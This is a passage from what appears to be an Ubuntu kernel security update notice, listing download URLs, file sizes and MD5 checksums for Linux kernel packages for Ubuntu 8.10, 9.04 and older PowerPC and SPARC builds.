http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    76672 863a1d5aaef2e7d8f5ec43318a2b3f7a\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    85976 b6bedff825f704ceb1269488d698bfbf\n    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    12702 cc2c9e83433b8f4092748b933292a46b\n    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    14560 60c8e6f2c5425b8bfea2cbee00dd50c2\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   449632 ff75fd65c13af279e6652e0d09505887\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   504134 364077fbb2c074eb8852249a757b89ae\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    83682 bcafd92384fdae95293c310f83443303\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   108840 2254f5416b8a0cd8d1cd52a57d7a064a\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    59570 0a8a1c6f109f6620c74d81880a6836ef\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    71732 e29b3839ae80a5cc8b8ca1756569e0bb\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    42454 35c72663f93201098e40f0fc36232ccc\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    91776 d7f14f387c9d325ba87761a2da581b5c\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   587190 a4606a71370a3dec9dc6a3aba35ec115\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   171076 2f15afec1e2aa78035659ac46b010cb3\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    22356 aa2c6396604a45f318881df2e562f625\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    46058 5633652b0f71f9e2098ce2798e29269f\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   152976 d7cbf92b5ae85f379d0335c693ccc256\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:  2135270 f05d76791e5538fa887f7731d170dc58\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb\n      Size/MD5:   565588 5d632e2a56604e4feff30e310f17f024\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb\n      Size/MD5:   563928 4b591c5db77c0f5bc41ffff32a14ee31\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb\n      Size/MD5: 14098262 0170c4f2c460270add65ba17eb7acfd0\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb\n      Size/MD5: 13830862 e4b6c695ad5b3e4ad0b428947b4fd388\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_sparc.deb\n      Size/MD5:   752654 6e9b50c2f72a60edf4df6e51d5448cc7\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   270064 879ee6667df636551d565e10ae5162fd\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   190360 388a92b9849a34e99f6a3d2817ca9b05\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   263030 82e8bd5f9f922af935f6f787942f4b2f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:  1386520 98436d21f7255a6c923b50900bd2de4d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   175444 37239b1899dd449d5b4985163c46d678\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   122106 1b86f75278b7fab22bbffd2c0010eef5\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    40398 81325db98acd64573c100455f0cb5289\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    48060 dd1b8744fcecf5959d2dac4a23b8cd34\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:     8698 a2a5a2941546e0137d8c57a38ba9ab2f\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    60516 08d388a60ac9be5c7d80d479f94fd4aa\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   106838 b350cddddb73537859dce8203c49ac1d\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:  1002034 0756e59f467bdefbc26dcb06a6201457\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:     9518 7bf2df83ac5364fef90bf13ea616e7e3\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   391514 9e98f9f4757387d261d6c7a1e8c7d61d\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    75924 b375f2838ce3f024a9f2b58d02f9d98e\n\nUpdated packages for Ubuntu 8.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.diff.gz\n      Size/MD5:  3279295 99a1653c9f3eb96475ee9776faff3701\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.dsc\n      Size/MD5:     2761 3b7c2f9d1b970a69db9a1c2c2bd5d95c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz\n      Size/MD5: 63721466 482b04f680ce6676114ccfaaf8f66a55\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-17.45_all.deb\n      Size/MD5:  3492310 1dbaf1873425d41dfce3b359fc95728e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17_2.6.27-17.45_all.deb\n      Size/MD5:  5906568 e4cb3deaf39ad7c3917d33f0f1082a40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-17.45_all.deb\n      Size/MD5: 52050112 2852d57c251b525e97d6ba66a94f1be5\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    36530 ae958becd299698d5f30f722eb07cde7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   265218 1de0174009daaf9e0d3fb8f8e737fa40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    53438 46087922e5b4128b6a5f52dcacfbf840\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    43030 e25c2b8fbd4f46654a1ebc6089ef31bc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    52344 4c16a22c0fe8f2a967f1503953ed5f8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    89844 4cc23c275cc1fd6621ac977881b91345\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    38180 24f5566a9c89334d394fb48d7c3d4949\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   677070 84220f4d0562b59edd2f0865120d4494\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   158618 edbaf560c5847b8f520ad94cd3f8d2d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    46346 90f299bb91f23a67e0811ae8e0472e70\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   154240 3ccfee605d2ef5a5e87aeb71320b337b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   313106 896f96e4eb01ff9381aaa78b6e1dc72d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:  2604320 b50756ed8aeeee4a72873b8c60df10b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_amd64.deb\n      Size/MD5:   663304 ef966b97630e8096fcf279d6c43b3960\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_amd64.deb\n      Size/MD5:   662184 599a4bf3bad78733d35ad1b4a5601a25\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_amd64.deb\n      Size/MD5: 23073032 96da11b5c1a75a1694b4047c1a71b091\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_amd64.deb\n      Size/MD5: 23071096 162a682066d9c7d90df92c975698b2cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_amd64.deb\n      Size/MD5: 10479836 39042ef6e7f9049837b4d137450dc41a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_amd64.deb\n      Size/MD5:   675844 3d711e518906ef37120bccabeaa1da2d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   434926 cc27207ed63847b17eab47e1978c98fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   186500 940e6b351f4975369720543184596a04\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   275594 b525586af57630fd8b4e098cef404ad9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:  1810688 13f3abe5b38ff8a704c985dc8f3275b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   151324 d883249df4fb86d6d9d1146db5fa1020\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   194282 ee6a6162a8b0615e73a89978fcb9d172\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   168150 696ed64f02936c7200cc9a468302de40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    36428 ff94b9ab68b2108fd9d1d2475c211725\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    83436 3dceac801e8b0405790e1a28c960183f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    71992 2b936af85a4eceb6312ad7ef93a18c88\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    23240 1d34a195f16d39f7895a2bf36281a6c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:     9012 454b1c03d70fbf4a917ff2431b6b4f2b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    68544 cd2e39978716c3448e54d6862877957c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   110302 ecb1005946c139f2340aaee3e80cd152\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:  1276186 d93285c15892be57cfb76798c746f88d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    47602 d2039335dc8bb4104fbb473b5ada0d96\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    13480 5299f432e2db456a3e0743fd786c18f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   393936 83cfaf207498b9a60d4e97cd21309095\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   200806 5dfbdf4ce61cbe469582c94509160a42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    13614 c860448fa643364e8776a4947cff9714\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    33948 74da15b4b68dc6a03f2da65175b021bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   244732 aee21df42a017731c52c53100cbf2f20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    55398 f4d1c18a70aec1e3e39572c36318115c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    41206 42a8188a1ad868fa58aa779b31908d65\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    48698 7e06c0fbdb39f426e1259d35e8f1505e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    86942 49099dad48131ce191b10c154f096d6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    34064 c8cf2cb88451687abb047df2faae44f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   675492 3e953f324652ef7a01f93aeaa2dc5e55\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   158402 aa593e2736e7b717ea8c561b1e11c27b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    43624 b2ca8774a7cf447123ea811781e80dbf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   145226 0fbb95dc0bc59baf91447250f19e7d45\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   302390 991c8e4ef2dda71d6deda5599129a768\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:  2436572 4b845d0a28c2b48ad0c29521bae3a0b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_i386.deb\n      Size/MD5:   645046 28f8ea5f653057c350d40feb64d68f2d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_i386.deb\n      Size/MD5:   645340 a4d347f729beffbf9ff1701d21a5f9b2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_i386.deb\n      Size/MD5: 23499764 59f3275c547e9f13f97eba55955725f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_i386.deb\n      Size/MD5: 23635906 c096ba5db0db8b87f67309a9e9c6ff5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_i386.deb\n      Size/MD5: 10117090 7e1648c7b3a3ab2606263ecb20683ba1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_i386.deb\n      Size/MD5:   675850 3e91710602fec2d4aebafe62a6cdfe80\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   433078 d1439530f50069f41b4c30b010871b4f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   171298 68b786d8853574467c792efe3fa62ca5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   264104 3a49c641e4a146fdb634b298c51ca6e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:  1994518 105c6b0fb8b650949da502f3fee2018d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   150964 dc4178cced6d9c1823d24b2204c15ae9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   184058 a25940b16b7022a52f7b8c78e164a908\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   157856 c628cef1c909819dab1fe2d812dffeba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    34500 2ea55d8e77aa3065af30ff4d440c059d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    78286 6d0f7704cdff848dbbfbd5fe60cf0ca7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    86190 c7d8ec25c3d35ea8455e9cf7c1b4ec64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    51332 79b56b5e7f79a17d45fb7c55f64954b3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:     8796 e571105caa3bed5fc3576928b03eff31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    64316 bcb0f12340567e9db7a5dcc3549dcf0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   102092 a2556a5171c52abe48ba423b008c6f13\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:  1450234 339572f5e579468fc438b1dd2cc2dcd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    44520 68267a8c684d01c673d4b41bf5d4af69\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    12642 80e228567fcb814cd67e54aec6abdb41\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   373158 483599df2e1b6c82a688b413b74e5b91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   189720 156d822da222b7fc8b887a4d1b3b7c31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    12992 7232aad22eb02ec694fa0d41d367a69c\n\nUpdated packages for Ubuntu 9.04:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.diff.gz\n      Size/MD5:  7350773 c09bf21927b9609694b39cdd55af21cf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.dsc\n      Size/MD5:     3198 5ba9f01bd70b951901d1d1667b964b54\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz\n      Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-18.59_all.deb\n      Size/MD5:  3636694 05fda32db7067b32c0fe593e1acf0533\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18_2.6.28-18.59_all.deb\n      Size/MD5:  8701396 65f8df38ba832ad50c6486d22420efca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-18.59_all.deb\n      Size/MD5: 56998214 3d33148ef29824c1060e1f66b470c6c4\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   234600 929bceffa24f85104c08edf073ac1f0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    44110 6d94c9d8ecfe3b4673d25cce1db2b95b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    43316 d895b0ad91a70c9381fd7e17650fab75\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    51116 da4c61dc01f5b5e8fb61cdf14bbbb40a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    90082 dad217572b5b07064b9e12b0062d16b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    38016 5e886058b306b4937f5a4ebe22451db6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   521628 d9f3ffe45b307847935002619ac31ea0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   125818 6fbc3c76a739b91e01da41bd535f3791\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    58060 cc30f23edae38f46b0d56f621969fd62\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   312502 9a11c9f0f37fee6a92c59de9df5fca11\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:  3872142 cdc4640244b192a5970dfc3d3efe4d7e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_amd64.deb\n      Size/MD5:   689228 bf7aedb2bbb365a73ed77a8976a2701e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_amd64.deb\n      Size/MD5:   689122 80cfc63043a2d7231f86ef3e68f0a131\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_amd64.deb\n      Size/MD5: 24344078 dca923a8044df0ba9c642d5f2b317867\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_amd64.deb\n      Size/MD5: 24335914 ad5a4fe70b4555e9399f9a45b58459f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_amd64.deb\n      Size/MD5: 10551276 b61ed90bb3d3f19f0d2e593c0e9f091a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_amd64.deb\n      Size/MD5:   766282 f86ee0c95591ea10b578e848b6fdeb5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   215170 7939440a8813110d952d86b49113e146\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   189496 f7495840a58b11f4ebfaad4d8cf203fe\n    